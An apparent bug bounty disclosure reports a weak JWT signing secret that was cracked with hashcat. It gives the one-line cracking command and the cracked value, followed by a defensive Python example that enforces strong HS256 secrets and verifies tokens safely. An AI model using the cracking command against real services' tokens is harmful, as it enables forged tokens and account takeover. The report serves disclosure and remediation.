JWT Private Program 2025-12-01
JWT Secret Brute Force Leading to Account Takeover
Severity: Critical | Status: Resolved
Summary
The application signed its JWTs with a weak, guessable HMAC secret. Using hashcat, I was able to crack the secret and forge tokens for any user.
Proof of Concept
# Save a captured JWT to jwt.txt, then crack the HS256 signing secret with hashcat (mode 16500 = JWT)
hashcat -a 0 -m 16500 jwt.txt wordlist.txt
# Cracked secret: "secret123"
Impact
Complete account takeover of any user including administrators.
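The root cause is a signing secret short and predictable enough to fall to a wordlist. The following is an added illustration, not the vendor's code, of the control that closes this class of bug: a startup policy check that refuses short or known-weak HS256 secrets (the 32-byte minimum follows RFC 7518's 256-bit recommendation for HS256), a CSPRNG-generated replacement secret, and a minimal sign/verify pair that pins the algorithm and compares signatures in constant time. The function names, the policy thresholds and the sample weak-secret list are assumptions made for this example; "secret123" is the value reported cracked above.

```python
"""Minimal HS256 JWT signer/verifier with a signing-secret policy check.

Added example using only the standard library; not the vendor's code.
MIN_SECRET_BYTES = 32 reflects RFC 7518 section 3.2 (HS256 keys of at
least 256 bits). Everything else here is an assumption for illustration.
"""
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional

MIN_SECRET_BYTES = 32  # 256 bits, the HS256 key size RFC 7518 calls for

# Constructed sample of low-entropy values a deployment audit should reject.
KNOWN_WEAK_SECRETS = {b"", b"secret", b"secret123", b"password", b"changeme"}


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    padding = "=" * (-len(text) % 4)
    return base64.urlsafe_b64decode(text + padding)


def secret_policy_violation(secret: bytes) -> Optional[str]:
    """Return why the secret is unfit for HS256, or None if it passes."""
    if secret in KNOWN_WEAK_SECRETS:
        return "secret is on the known-weak list"
    if len(secret) < MIN_SECRET_BYTES:
        return f"secret is {len(secret)} bytes; need at least {MIN_SECRET_BYTES}"
    if len(set(secret)) < 8:
        return "secret has too few distinct bytes to be random"
    return None


def generate_secret() -> bytes:
    """Generate a fresh signing secret from the OS CSPRNG."""
    return secrets.token_bytes(MIN_SECRET_BYTES)


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Produce a compact JWT; refuses to sign with a policy-violating secret."""
    reason = secret_policy_violation(secret)
    if reason is not None:
        raise ValueError(f"refusing to sign: {reason}")
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        _b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + _b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + _b64url_encode(sig)


def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """Return the payload if the signature checks out, otherwise None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        provided_sig = _b64url_decode(sig_b64)
    except ValueError:  # covers malformed base64 and malformed JSON
        return None
    # Pin the algorithm server-side: the token's header never chooses it.
    if header.get("alg") != "HS256":
        return None
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, provided_sig):
        return None
    return json.loads(_b64url_decode(payload_b64))


if __name__ == "__main__":
    print("secret123:", secret_policy_violation(b"secret123"))
    strong = generate_secret()
    token = sign_hs256({"sub": "alice", "role": "user"}, strong)
    print("verified:", verify_hs256(token, strong))
    print("wrong key:", verify_hs256(token, generate_secret()))
```

Running the policy check once at service startup (and failing closed when it reports a violation) turns a silently weak deployment into a loud misconfiguration; with a 32-byte random secret, the wordlist attack shown in the proof of concept has nothing to find.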
Responsible Disclosure
This vulnerability was reported responsibly and fixed by the vendor before public disclosure.